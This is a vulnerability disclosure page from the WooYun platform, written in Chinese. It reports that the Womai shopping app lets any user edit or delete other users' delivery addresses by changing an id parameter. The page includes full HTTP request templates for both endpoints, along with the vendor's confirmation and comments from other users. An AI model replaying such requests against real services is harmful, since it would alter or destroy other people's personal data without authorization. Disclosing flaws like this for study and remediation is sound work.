中粮我买网任意用户地址修改、删除 | wooyun-2013-045411| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045411

漏洞标题：中粮我买网任意用户地址修改、删除

漏洞作者：带馅儿馒头

提交时间：2013-12-09 18:00

修复时间：2014-01-23 18:01

公开时间：2014-01-23 18:01

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-09：细节已通知厂商并且等待厂商处理中
2013-12-10：厂商已经确认，细节仅向厂商公开
2013-12-20：细节向核心白帽子及相关领域专家公开
2013-12-30：细节向普通白帽子公开
2014-01-09：细节向实习白帽子公开
2014-01-23：细节向公众公开

简要描述：

恭喜发财~

详细说明：

问题在中粮我买的app端，对接口校验不严格呀~
1.修改用户的地址
下面是我们修改的对象：

app端的修改地址接口如下：

POST http://mobile.womai.com/wmapi/addressedit HTTP/1.1
Host: mobile.womai.com
Usersession: db68b4a6e1fe429f809de9922cfb944d
Osversion: 7.0.4
Connection: close
Mid: 0
Udid: 02:00:00:00:00:00
Userid: 10363xx7
Connection: close
Accept-Encoding: gzip
Os: ios
User-Agent: 中粮我买网 1.3.2 (iPhone; iPhone OS 7.0.4; zh_CN)
Sourceid: 1001
Appversion: 1.3.2
Ver: 1.0
Appkey: 9980998
Time: 2013-12-09 09:15:02 +0000
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 140
Unique: b59a2f93b10b8de95963c0dd6497cf76
Cookie: 
id=69xxx1&name=%E7%83%9F%E5%A4%B41&area=67302&mobilephone=13800138000&city=31002&detail=%E5%B9%B2%E5%87%80%E5%88%A9%E8%90%BD&province=31000

通过修改id参数即可达到效果；

看结果：

2.任意用户地址删除
删除用户收货地址的接口为：

POST http://mobile.womai.com/wmapi/addressdel HTTP/1.1
Host: mobile.womai.com
Usersession: db68b4a6e1fe429f809de9922cfb944d
Osversion: 7.0.4
Connection: close
Mid: 0
Udid: 02:00:00:00:00:00
Userid: 1036xx17
Connection: close
Accept-Encoding: gzip
Os: ios
User-Agent: 中粮我买网 1.3.2 (iPhone; iPhone OS 7.0.4; zh_CN)
Sourceid: 1001
Appversion: 1.3.2
Ver: 1.0
Appkey: 9980998
Time: 2013-12-09 09:08:26 +0000
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 10
Unique: b59a2f93b10b8de95963c0dd6497cf76
Cookie: 
id=6931724

同样的修改id即可达到效果；

已经被删除；

漏洞证明：

见详细说明

修复方案：

各种校验呀

版权声明：转载请注明来源带馅儿馒头@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：17

确认时间：2013-12-10 10:54

厂商回复：

感谢洞主，这个问题，已经反反复复很多次了。。不由得令人黯然神伤。。

漏洞评价：

2013-12-10 08:57 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

这个一直是个问题唉
2013-12-10 13:22 | 小川 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

这不科学啊
2013-12-10 14:21 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

@zzR @小川应该还是那个问题
2014-01-09 11:12 | Evi1c0de ( 实习白帽子 | Rank:31 漏洞数:9 | 夜太黑)

不由得令人黯然神伤。
2014-01-23 19:35 | ziwen ( 实习白帽子 | Rank:49 漏洞数:4 | 活着为了乐还是为了苦？)

==难道一直没补上吗连越权都补不上吗

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045411

漏洞标题：中粮我买网任意用户地址修改、删除

相关厂商：中粮我买网

漏洞作者：带馅儿馒头

提交时间：2013-12-09 18:00

修复时间：2014-01-23 18:01

公开时间：2014-01-23 18:01

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源带馅儿馒头@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045411

漏洞标题：中粮我买网任意用户地址修改、删除

相关厂商：中粮我买网

漏洞作者： 带馅儿馒头

提交时间：2013-12-09 18:00

修复时间：2014-01-23 18:01

公开时间：2014-01-23 18:01

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-045411"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：带馅儿馒头

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源带馅儿馒头@乌云